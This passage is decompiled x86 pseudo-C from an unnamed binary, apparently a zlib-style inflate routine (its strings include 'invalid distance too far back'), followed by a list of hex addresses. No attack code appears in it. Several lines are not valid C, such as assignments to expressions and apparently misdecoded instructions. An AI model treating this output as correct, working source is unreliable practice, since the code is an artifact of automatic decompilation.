																		if(__ecx != 0) {
																			__edx =  *(__esp + 0x38);
																			do {
																				__eax =  *(__edi + 0x68);
																				 *((short*)(__edi + 0x70 +  *(__edi + 0x68) * 2)) = __dx;
																				 *(__edi + 0x68) = 1 +  *(__edi + 0x68);
																				__ecx = __ecx - 1;
																				__eflags = __ecx;
																			} while (__ecx != 0);
																		}
																		__ecx =  *(__esp + 0x20);
																		__edi =  *(__esp + 0x10);
																		goto L240;
																	}
																}
															} else {
																while(1) {
																	__eflags = __ebp;
																	if(__ebp == 0) {
																		goto L104;
																	}
																	__edx =  *__ebx & 0x000000ff;
																	__ecx = __esi;
																	__edx = ( *__ebx & 0x000000ff) << __cl;
																	__ebx = __ebx + 1;
																	__edi = __edi + __edx;
																	 *(__esp + 0x14) = __ebx;
																	__esi = __esi + 8;
																	 *(__esp + 0x10) = __edi;
																	__ebp = __ebp - 1;
																	__eflags = __esi -  *(__esp + 0x38);
																	if(__esi <  *(__esp + 0x38)) {
																		continue;
																	} else {
																		goto L219;
																	}
																	goto L370;
																}
																goto L104;
															}
														}
													} else {
														__eax = __eax >> 8;
														__ecx = __al & 0x000000ff;
														__eax =  *(__esp + 0x34);
														__esi = __esi - (__al & 0x000000ff);
														__edi = __edi >> __cl;
														__ecx =  *(__esp + 0x20);
														 *(__esp + 0x10) = __edi;
														 *((short*)(__ecx + 0x70 +  *(__esp + 0x34) * 2)) = __dx;
														 *(__ecx + 0x68) = 1 +  *(__ecx + 0x68);
														goto L240;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L104;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__edx = 1;
														__edi = __edi + (( *__ebx & 0x000000ff) << __cl);
														__ebx = __ebx + 1;
														__eax =  *(__esp + 0x40);
														__esi = __esi + 8;
														__ebp = __ebp - 1;
														 *(__esp + 0x10) = __edi;
														 *(__esp + 0x14) = __ebx;
														__ecx =  *( *(__esp + 0x40));
														__eax =  *(__esp + 0x20);
														1 << __cl = (1 << __cl) - 1;
														__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
														__eax =  *( *(__esp + 0x20) + 0x4c);
														__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
														__eax = __eax >> 8;
														__ecx = __cl & 0x000000ff;
														 *(__esp + 0x38) = __eax;
														__eflags = (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L212;
														}
														goto L370;
													}
													goto L104;
												}
												goto L370;
												L240:
												__eax =  *(__ecx + 0x64);
												__edx =  *(__ecx + 0x68);
												__eax =  *(__ecx + 0x64) +  *((intOrPtr*)(__ecx + 0x60));
												 *(__esp + 0x34) = __edx;
												__eflags = __edx - __eax;
											} while (__edx < __eax);
											__edi =  *(__esp + 0x20);
											goto L242;
										}
										goto L370;
									case 0x13:
										L252:
										 *__edi = 0x14;
										goto L253;
									case 0x14:
										L253:
										__eflags = __ebp - 6;
										if(__ebp < 6) {
											L257:
											__eax =  *(__edi + 0x4c);
											__ecx =  *(__edi + 0x54);
											 *(__esp + 0x34) =  *(__edi + 0x4c);
											1 = 1 << __cl;
											__ecx =  *(__edi + 0x4c);
											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
											 *(__edi + 0x1bc4) = 0;
											__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
											1 = 1 >> 8;
											__ecx = __cl & 0x000000ff;
											__eflags = (__cl & 0x000000ff) - __esi;
											if((__cl & 0x000000ff) <= __esi) {
												L260:
												__eflags = __al;
												if(__al == 0) {
													L267:
													__eax = __eax >> 8;
													__ecx = __cl & 0x000000ff;
													 *(__edi + 0x1bc4) =  *(__edi + 0x1bc4) + __ecx;
													__esi = __esi - __ecx;
													__edx = __edx >> __cl;
													__ecx = __eax;
													__ecx = __eax >> 0x10;
													 *(__esp + 0x10) = __edx;
													 *(__edi + 0x40) = __ecx;
													__eflags = __al;
													if(__al != 0) {
														__eflags = __al & 0x00000020;
														if((__al & 0x00000020) == 0) {
															__eflags = __al & 0x00000040;
															if((__al & 0x00000040) == 0) {
																__eax = __al & 0x000000ff;
																__eax = __al & 0xf;
																__eflags = __eax;
																 *__edi = 0x15;
																 *(__edi + 0x48) = __eax;
																goto L274;
															} else {
																__ecx =  *(__esp + 0x48);
																 *(__ecx + 0x18) = "invalid literal/length code";
																 *__edi = 0x1d;
																goto L183;
															}
														} else {
															 *(__edi + 0x1bc4) = 0xffffffff;
															 *__edi = 0xb;
															goto L182;
														}
													} else {
														 *__edi = 0x19;
														goto L182;
													}
												} else {
													__eflags = __al & 0x000000f0;
													if((__al & 0x000000f0) != 0) {
														goto L267;
													} else {
														__ecx = __eax;
														__ebx = 1;
														__ecx = __eax >> 8;
														__edx = __eax;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __eax >> 8;
														__al & 0x000000ff = (__al & 0x000000ff) + __edi;
														__eax = __eax >> 0x10;
														__ebx = 1 << __cl;
														__ecx = __edi;
														__ebx = (1 << __cl) - 1;
														 *(__esp + 0x38) = __edx;
														(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
														__ecx =  *(__esp + 0x34);
														__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
														__eax =  *( *(__esp + 0x34) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
														__eax = __eax >> 8;
														__edi = __cl & 0x000000ff;
														 *(__esp + 0x30) = __cl & 0x000000ff;
														__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
														__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
														if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
															L266:
															__edi =  *(__esp + 0x20);
															__ebx =  *(__esp + 0x14);
															__ecx = __dh & 0x000000ff;
															__edx =  *(__esp + 0x10);
															__edx =  *(__esp + 0x10) >> __cl;
															__esi = __esi - __ecx;
															__eflags = __esi;
															 *(__edi + 0x1bc4) = __ecx;
															goto L267;
														} else {
															while(1) {
																__eflags = __ebp;
																if(__ebp == 0) {
																	goto L103;
																}
																__ebx =  *(__esp + 0x14);
																__ecx = __esi;
																__edi = 1;
																__esi = __esi + 8;
																__ebp = __ebp - 1;
																__eax =  *__ebx & 0x000000ff;
																__ebx = __ebx + 1;
																 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
																__eax =  *(__esp + 0x3a) & 0x0000ffff;
																 *(__esp + 0x14) = __ebx;
																__ebx = __dh & 0x000000ff;
																__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
																__edi = 1 << __cl;
																__ecx = __ebx;
																(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
																((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff);
																 *(__esp + 0x20) =  *( *(__esp + 0x20) + 0x4c);
																__eax =  *( *( *(__esp + 0x20) + 0x4c) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff)) * 4);
																__eax = __eax >> 8;
																__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
																__eflags = __ebx + (__cl & 0x000000ff) - __esi;
																if(__ebx + (__cl & 0x000000ff) > __esi) {
																	continue;
																} else {
																	goto L266;
																}
																goto L370;
															}
															goto L103;
														}
													}
												}
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x54);
													__edx = __edx + __eax;
													__eax =  *(__edi + 0x4c);
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													__edx = 1;
													 *(__esp + 0x14) = __ebx;
													1 << __cl = (1 << __cl) - 1;
													__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
													__eax =  *( *(__edi + 0x4c) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
													__ecx = __eax;
													__edx =  *(__esp + 0x10);
													__eax >> 8 = __cl & 0x000000ff;
													__eflags = (__cl & 0x000000ff) - __esi;
													if((__cl & 0x000000ff) > __esi) {
														continue;
													} else {
														goto L260;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											__eflags =  *(__esp + 0x18) - 0x102;
											if( *(__esp + 0x18) < 0x102) {
												goto L257;
											} else {
												__eax =  *(__esp + 0x24);
												_push( *(__esp + 0x28));
												 *(0xc + __ecx) = __eax;
												__eax =  *(__esp + 0x1c);
												 *(__ecx + 0x10) =  *(__esp + 0x1c);
												 *__ecx = __ebx;
												 *(__ecx + 4) = __ebp;
												_push(__ecx);
												 *(__edi + 0x38) = __edx;
												 *(__edi + 0x3c) = __esi;
												__eax = E00411250();
												__ecx =  *(__esp + 0x50);
												__esp = __esp + 8;
												__eflags =  *__edi - 0xb;
												__edx =  *(__edi + 0x38);
												__esi =  *(__edi + 0x3c);
												__eax =  *(0xc + __ecx);
												__ebx =  *__ecx;
												__ebp =  *(__ecx + 4);
												 *(__esp + 0x24) =  *(0xc + __ecx);
												__eax =  *(__ecx + 0x10);
												 *(__esp + 0x18) = __eax;
												 *(__esp + 0x14) = __ebx;
												 *(__esp + 0x10) = __edx;
												if( *__edi == 0xb) {
													 *(__edi + 0x1bc4) = 0xffffffff;
												}
												goto L183;
											}
										}
										goto L370;
									case 0x15:
										L274:
										__ecx =  *(__edi + 0x48);
										__eflags = __ecx;
										if(__ecx == 0) {
											L280:
											__eax =  *(__edi + 0x40);
											 *(__edi + 0x1bc8) =  *(__edi + 0x40);
											 *__edi = 0x16;
											goto L281;
										} else {
											__eflags = __esi - __ecx;
											if(__esi >= __ecx) {
												L279:
												__eax = 1;
												__esi = __esi - __ecx;
												1 << __cl = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
												__edx = __edx >> __cl;
												 *(__edi + 0x40) =  *(__edi + 0x40) + __eax;
												_t539 = __edi + 0x1bc4;
												 *_t539 =  *(__edi + 0x1bc4) + __ecx;
												__eflags =  *_t539;
												 *(__esp + 0x10) = __edx;
												goto L280;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x48);
													__edx = __edx + __eax;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													 *(__esp + 0x14) = __ebx;
													__eflags = __esi - __ecx;
													if(__esi < __ecx) {
														continue;
													} else {
														goto L279;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 0x16:
										L281:
										__eax =  *(__edi + 0x50);
										__ecx =  *(__edi + 0x58);
										 *(__esp + 0x34) =  *(__edi + 0x50);
										1 = 1 << __cl;
										__ecx =  *(__edi + 0x50);
										(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
										__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
										1 = 1 >> 8;
										__ecx = __cl & 0x000000ff;
										__eflags = (__cl & 0x000000ff) - __esi;
										if((__cl & 0x000000ff) <= __esi) {
											L284:
											__eflags = __al & 0x000000f0;
											if((__al & 0x000000f0) != 0) {
												L289:
												__ebx =  *(__esp + 0x14);
												__eax = __eax >> 8;
												__ecx = __cl & 0x000000ff;
												 *(__edi + 0x1bc4) =  *(__edi + 0x1bc4) + __ecx;
												__esi = __esi - __ecx;
												__edx = __edx >> __cl;
												 *(__esp + 0x10) = __edx;
												__eflags = __al & 0x00000040;
												if((__al & 0x00000040) == 0) {
													__ecx = __eax;
													 *__edi = 0x17;
													__ecx = __eax >> 0x10;
													__eax = __al & 0x000000ff;
													__eax = __al & 0xf;
													__eflags = __eax;
													 *(__edi + 0x44) = __ecx;
													 *(__edi + 0x48) = __eax;
													goto L292;
												} else {
													__ecx =  *(__esp + 0x48);
													 *(__ecx + 0x18) = "invalid distance code";
													 *__edi = 0x1d;
													goto L183;
												}
											} else {
												__ecx = __eax;
												__ebx = 1;
												__ecx = __eax >> 8;
												__edx = __eax;
												__edi = __cl & 0x000000ff;
												 *(__esp + 0x30) = __eax >> 8;
												__al & 0x000000ff = (__al & 0x000000ff) + __edi;
												__eax = __eax >> 0x10;
												__ebx = 1 << __cl;
												__ecx = __edi;
												__ebx = (1 << __cl) - 1;
												 *(__esp + 0x38) = __edx;
												(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
												__ecx =  *(__esp + 0x34);
												__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
												__eax =  *( *(__esp + 0x34) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
												__eax = __eax >> 8;
												__edi = __cl & 0x000000ff;
												 *(__esp + 0x30) = __cl & 0x000000ff;
												__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
												__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
													L288:
													__edi =  *(__esp + 0x20);
													__ecx = __dh & 0x000000ff;
													__edx =  *(__esp + 0x10);
													__esi = __esi - __ecx;
													__edx =  *(__esp + 0x10) >> __cl;
													_t579 = __edi + 0x1bc4;
													 *_t579 =  *(__edi + 0x1bc4) + __ecx;
													__eflags =  *_t579;
													goto L289;
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__ebx =  *(__esp + 0x14);
														__ecx = __esi;
														__edi = 1;
														__esi = __esi + 8;
														__ebp = __ebp - 1;
														__eax =  *__ebx & 0x000000ff;
														__ebx = __ebx + 1;
														 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
														__eax =  *(__esp + 0x3a) & 0x0000ffff;
														 *(__esp + 0x14) = __ebx;
														__ebx = __dh & 0x000000ff;
														__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
														__edi = 1 << __cl;
														__ecx = __ebx;
														(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
														((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff);
														 *(__esp + 0x20) =  *( *(__esp + 0x20) + 0x50);
														__eax =  *( *( *(__esp + 0x20) + 0x50) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x3a) & 0x0000ffff)) * 4);
														__eax = __eax >> 8;
														__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
														__eflags = __ebx + (__cl & 0x000000ff) - __esi;
														if(__ebx + (__cl & 0x000000ff) > __esi) {
															continue;
														} else {
															goto L288;
														}
														goto L370;
													}
													goto L103;
												}
											}
										} else {
											while(1) {
												__eflags = __ebp;
												if(__ebp == 0) {
													goto L103;
												}
												__eax =  *__ebx & 0x000000ff;
												__ecx = __esi;
												__eax = ( *__ebx & 0x000000ff) << __cl;
												__ebx = __ebx + 1;
												__ecx =  *(__edi + 0x58);
												__edx = __edx + __eax;
												__eax =  *(__edi + 0x50);
												__esi = __esi + 8;
												 *(__esp + 0x10) = __edx;
												__ebp = __ebp - 1;
												__edx = 1;
												 *(__esp + 0x14) = __ebx;
												1 << __cl = (1 << __cl) - 1;
												__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
												__ecx = __eax;
												__edx =  *(__esp + 0x10);
												__eax >> 8 = __cl & 0x000000ff;
												__eflags = (__cl & 0x000000ff) - __esi;
												if((__cl & 0x000000ff) > __esi) {
													continue;
												} else {
													goto L284;
												}
												goto L370;
											}
											goto L103;
										}
										goto L370;
									case 0x17:
										L292:
										__ecx =  *(__edi + 0x48);
										__eflags = __ecx;
										if(__ecx == 0) {
											L298:
											 *__edi = 0x18;
											goto L299;
										} else {
											__eflags = __esi - __ecx;
											if(__esi >= __ecx) {
												L297:
												__eax = 1;
												__esi = __esi - __ecx;
												1 << __cl = (1 << __cl) - 1;
												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
												__edx = __edx >> __cl;
												 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
												_t597 = __edi + 0x1bc4;
												 *_t597 =  *(__edi + 0x1bc4) + __ecx;
												__eflags =  *_t597;
												 *(__esp + 0x10) = __edx;
												goto L298;
											} else {
												while(1) {
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L103;
													}
													__eax =  *__ebx & 0x000000ff;
													__ecx = __esi;
													__eax = ( *__ebx & 0x000000ff) << __cl;
													__ebx = __ebx + 1;
													__ecx =  *(__edi + 0x48);
													__edx = __edx + __eax;
													__esi = __esi + 8;
													 *(__esp + 0x10) = __edx;
													__ebp = __ebp - 1;
													 *(__esp + 0x14) = __ebx;
													__eflags = __esi - __ecx;
													if(__esi < __ecx) {
														continue;
													} else {
														goto L297;
													}
													goto L370;
												}
												goto L103;
											}
										}
										goto L370;
									case 0x18:
										L299:
										__ecx =  *(__esp + 0x18);
										__eflags = __ecx;
										if(__ecx == 0) {
											goto L103;
										} else {
											__eax =  *(__esp + 0x28);
											__eax =  *(__esp + 0x28) - __ecx;
											__ecx =  *(__edi + 0x44);
											__eflags = __ecx - __eax;
											if(__ecx <= __eax) {
												__eax =  *(__esp + 0x24);
												__eax =  *(__esp + 0x24) - __ecx;
												__eflags = __eax;
												 *(__esp + 0x38) = __eax;
												__eax =  *(__edi + 0x40);
												goto L310;
											} else {
												__ecx = __ecx - __eax;
												__eflags = __ecx -  *((intOrPtr*)(__edi + 0x2c));
												if(__ecx <=  *((intOrPtr*)(__edi + 0x2c))) {
													L304:
													__eax =  *(__edi + 0x30);
													__eflags = __ecx - __eax;
													if(__ecx <= __eax) {
														 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) - __ecx;
														__eax =  *((intOrPtr*)(__edi + 0x34)) - __ecx +  *(__edi + 0x30);
														__eflags = __eax;
													} else {
														__ecx = __ecx - __eax;
														 *((intOrPtr*)(__edi + 0x34)) =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28));
														__eax =  *((intOrPtr*)(__edi + 0x34)) +  *((intOrPtr*)(__edi + 0x28)) - __ecx;
													}
													 *(__esp + 0x38) = __eax;
													__eax =  *(__edi + 0x40);
													__eflags = __ecx - __eax;
													if(__ecx > __eax) {
														L310:
														__ecx = __eax;
													}
													__eflags = __ecx -  *(__esp + 0x18);
													if(__ecx >  *(__esp + 0x18)) {
														__ecx =  *(__esp + 0x18);
													}
													__ebx =  *(__esp + 0x38);
													__eax = __eax - __ecx;
													 *(__esp + 0x18) =  *(__esp + 0x18) - __ecx;
													 *(__edi + 0x40) = __eax;
													__edi =  *(__esp + 0x24);
													__ebx =  *(__esp + 0x38) - __edi;
													__eflags = __ebx;
													do {
														__al =  *((intOrPtr*)(__ebx + __edi));
														 *__edi = __al;
														__edi = 1 + __edi;
														__ecx = __ecx - 1;
														__eflags = __ecx;
													} while (__ecx != 0);
													__ebx =  *(__esp + 0x14);
													 *(__esp + 0x24) = __edi;
													__edi =  *(__esp + 0x20);
													__eflags =  *(__edi + 0x40) - __ecx;
													if( *(__edi + 0x40) == __ecx) {
														 *__edi = 0x14;
													}
													L182:
													_t771 =  *(_t812 + 0x48);
												} else {
													__eflags =  *(__edi + 0x1bc0);
													if( *(__edi + 0x1bc0) == 0) {
														goto L304;
													} else {
														__ecx =  *(__esp + 0x48);
														 *(__ecx + 0x18) = "invalid distance too far back";
														 *__edi = 0x1d;
													}
												}
											}
											goto L183;
										}
										goto L370;
									case 0x19:
										__eflags =  *(__esp + 0x18);
										if( *(__esp + 0x18) == 0) {
											goto L103;
										} else {
											__ebx =  *(__esp + 0x24);
											__al =  *(__edi + 0x40);
											 *(__esp + 0x24) =  *(__esp + 0x24) + 1;
											 *(__esp + 0x18) =  *(__esp + 0x18) - 1;
											 *( *(__esp + 0x24)) = __al;
											__ebx =  *(__esp + 0x14);
											 *__edi = 0x14;
											goto L183;
										}
										goto L370;
									case 0x1a:
										__eflags =  *(__edi + 8);
										if ( *(__edi + 8) == 0) goto L335;
										__eflags = __al & __cl;
										 *__eax =  *__eax + __al;
										_t640 = __ebx + 0x277320fe;
										 *_t640 =  *(__ebx + 0x277320fe) + __al;
										__eflags =  *_t640;
									case 0x1b:
										__eflags =  *(__edi + 8);
										if( *(__edi + 8) == 0) {
											L346:
											 *__edi = 0x1c;
											goto L347;
										} else {
											__eflags =  *(__edi + 0x10);
											if( *(__edi + 0x10) == 0) {
												goto L346;
											} else {
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L342:
													__eflags = __edx -  *((intOrPtr*)(__edi + 0x1c));
													if(__edx ==  *((intOrPtr*)(__edi + 0x1c))) {
														__ecx = 0;
														__esi = 0;
														__eflags = 0;
														 *(__esp + 0x10) = 0;
														goto L346;
													} else {
														__ecx =  *(__esp + 0x48);
														 *(__ecx + 0x18) = "incorrect length check";
														 *__edi = 0x1d;
														goto L183;
													}
												} else {
													while(1) {
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L103;
														}
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L342;
														}
														goto L370;
													}
													goto L103;
												}
											}
										}
										goto L370;
									case 0x1c:
										L347:
										 *(__esp + 0x2c) = 1;
										goto L103;
									case 0x1d:
										 *(__esp + 0x2c) = 0xfffffffd;
										L103:
										_t795 =  *(_t812 + 0x10);
										L104:
										_t787 =  *((intOrPtr*)(_t812 + 0x4c));
										L105:
										_t778 =  *(_t812 + 0x48);
										_t767 =  *(_t812 + 0x20);
										_t778[3] =  *(_t812 + 0x24);
										_t778[4] =  *(_t812 + 0x18);
										_t778[1] = _t805;
										_t807 =  *((intOrPtr*)(_t812 + 0x28));
										 *_t778 =  *(_t812 + 0x14);
										__eflags =  *(_t767 + 0x28);
										 *(_t767 + 0x38) = _t795;
										 *(_t767 + 0x3c) = _t798;
										if( *(_t767 + 0x28) != 0) {
											L110:
											_t743 = E004101E0(_t778, _t778[3], _t807 - _t778[4]);
											_t812 = _t812 + 0xc;
											__eflags = _t743;
											if(_t743 == 0) {
												_t778 =  *(_t812 + 0x48);
												goto L353;
											} else {
												 *_t767 = 0x1e;
												goto L112;
											}
										} else {
											__eflags = _t807 - _t778[4];
											if(_t807 == _t778[4]) {
												L353:
												_t745 =  *((intOrPtr*)(_t812 + 0x3c)) - _t778[1];
												_t808 = _t807 - _t778[4];
												_t778[2] =  &(_t778[2][_t745]);
												_t778[5] =  &(_t778[5][_t808]);
												 *((intOrPtr*)(_t767 + 0x1c)) =  *((intOrPtr*)(_t767 + 0x1c)) + _t808;
												__eflags =  *(_t767 + 8);
												 *((intOrPtr*)(_t812 + 0x3c)) = _t745;
												if( *(_t767 + 8) == 0) {
													L358:
													_t796 =  *(_t812 + 0x48);
												} else {
													__eflags = _t808;
													if(_t808 == 0) {
														goto L358;
													} else {
														_push(_t808);
														__eflags =  *(_t767 + 0x10);
														_push(_t778[3] - _t808);
														_push( *(_t767 + 0x18));
														if( *(_t767 + 0x10) == 0) {
															_t757 = E00410AD0();
															_t796 =  *(_t812 + 0x54);
															_t812 = _t812 + 0xc;
															 *(_t767 + 0x18) = _t757;
															_t796[0xc] = _t757;
														} else {
															_t758 = E004102D0();
															_t796 =  *(_t812 + 0x54);
															_t812 = _t812 + 0xc;
															 *(_t767 + 0x18) = _t758;
															_t796[0xc] = _t758;
														}
													}
												}
												_t788 =  *_t767;
												__eflags = _t788 - 0x13;
												if(_t788 == 0x13) {
													L362:
													_t800 = 0x100;
												} else {
													__eflags = _t788 - 0xe;
													if(_t788 == 0xe) {
														goto L362;
													} else {
														_t800 = 0;
													}
												}
												asm("sbb ecx, ecx");
												_t788 - 0xb =  *((intOrPtr*)(_t812 + 0x3c));
												_t796[0xb] = ((0 | _t788 != 0x0000000b) - 0x00000001 & 0x00000080) + ( ~( *(_t767 + 4)) & 0x00000040) + _t800 +  *(_t767 + 0x3c);
												if( *((intOrPtr*)(_t812 + 0x3c)) != 0) {
													L365:
													__eflags =  *((intOrPtr*)(_t812 + 0x4c)) - 4;
													if( *((intOrPtr*)(_t812 + 0x4c)) != 4) {
														return  *(_t812 + 0x2c);
													} else {
														goto L366;
													}
												} else {
													__eflags = _t808;
													if(_t808 == 0) {
														L366:
														_t753 =  *(_t812 + 0x2c);
														__eflags = _t753;
														if(_t753 != 0) {
															goto L113;
														} else {
															return 0xfffffffb;
														}
													} else {
														goto L365;
													}
												}
											} else {
												_t759 =  *_t767;
												__eflags = _t759 - 0x1d;
												if(_t759 >= 0x1d) {
													goto L353;
												} else {
													__eflags = _t759 - 0x1a;
													if(_t759 < 0x1a) {
														goto L110;
													} else {
														__eflags = _t787 - 4;
														if(_t787 == 4) {
															goto L353;
														} else {
															goto L110;
														}
													}
												}
											}
										}
										goto L370;
									case 0x1e:
										L112:
										_t753 = 0xfffffffc;
										L113:
										return _t753;
										goto L370;
								}
								L183:
								_t721 =  *_t794;
							} while (_t721 <= 0x1e);
							goto L184;
						}
					}
				}
				L370:
			}












                                                                                                                                                                      0x0040e800
                                                                                                                                                                      0x0040e80a
                                                                                                                                                                      0x0040fe36
                                                                                                                                                                      0x0040fe3f
                                                                                                                                                                      0x0040e810
                                                                                                                                                                      0x0040e810
                                                                                                                                                                      0x0040e813
                                                                                                                                                                      0x0040e819
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040e838
                                                                                                                                                                      0x0040e83b
                                                                                                                                                                      0x0040e83d
                                                                                                                                                                      0x0040e83d
                                                                                                                                                                      0x0040e846
                                                                                                                                                                      0x0040e849
                                                                                                                                                                      0x0040e84d
                                                                                                                                                                      0x0040e853
                                                                                                                                                                      0x0040e857
                                                                                                                                                                      0x0040e85e
                                                                                                                                                                      0x0040e861
                                                                                                                                                                      0x0040e865
                                                                                                                                                                      0x0040e867
                                                                                                                                                                      0x0040e86b
                                                                                                                                                                      0x0040e86f
                                                                                                                                                                      0x0040e874
                                                                                                                                                                      0x0040e87a
                                                                                                                                                                      0x0040f1b5
                                                                                                                                                                      0x0040f1c1
                                                                                                                                                                      0x0040e880
                                                                                                                                                                      0x0040e883
                                                                                                                                                                      0x0040e887
                                                                                                                                                                      0x0040e890
                                                                                                                                                                      0x0040e890
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040e897
                                                                                                                                                                      0x0040e89c
                                                                                                                                                                      0x0040e8a9
                                                                                                                                                                      0x0040e8ac
                                                                                                                                                                      0x0040e8da
                                                                                                                                                                      0x0040e8da
                                                                                                                                                                      0x0040e8dc
                                                                                                                                                                      0x0040e923
                                                                                                                                                                      0x0040e923
                                                                                                                                                                      0x0040e926
                                                                                                                                                                      0x0040e92d
                                                                                                                                                                      0x0040e92f
                                                                                                                                                                      0x0040e931
                                                                                                                                                                      0x0040e931
                                                                                                                                                                      0x0040e938
                                                                                                                                                                      0x0040e93c
                                                                                                                                                                      0x0040e9fc
                                                                                                                                                                      0x0040e9fc
                                                                                                                                                                      0x0040ea03
                                                                                                                                                                      0x0040e942
                                                                                                                                                                      0x0040e94f
                                                                                                                                                                      0x0040e958
                                                                                                                                                                      0x0040e95a
                                                                                                                                                                      0x0040e95e
                                                                                                                                                                      0x0040e9f8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040e964
                                                                                                                                                                      0x0040e968
                                                                                                                                                                      0x0040e96a
                                                                                                                                                                      0x0040e982
                                                                                                                                                                      0x0040e985
                                                                                                                                                                      0x0040e988
                                                                                                                                                                      0x0040e98d
                                                                                                                                                                      0x0040e994
                                                                                                                                                                      0x0040e997
                                                                                                                                                                      0x0040e999
                                                                                                                                                                      0x0040e9de
                                                                                                                                                                      0x0040e9e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040e9e2
                                                                                                                                                                      0x0040e9e2
                                                                                                                                                                      0x0040e9e6
                                                                                                                                                                      0x0040e9ed
                                                                                                                                                                      0x0040e9ed
                                                                                                                                                                      0x0040e99b
                                                                                                                                                                      0x0040e99b
                                                                                                                                                                      0x0040e99e
                                                                                                                                                                      0x0040e99e
                                                                                                                                                                      0x0040e9a7
                                                                                                                                                                      0x0040e9a9
                                                                                                                                                                      0x0040e9ab
                                                                                                                                                                      0x0040e9ae
                                                                                                                                                                      0x0040e9b3
                                                                                                                                                                      0x0040e9b7
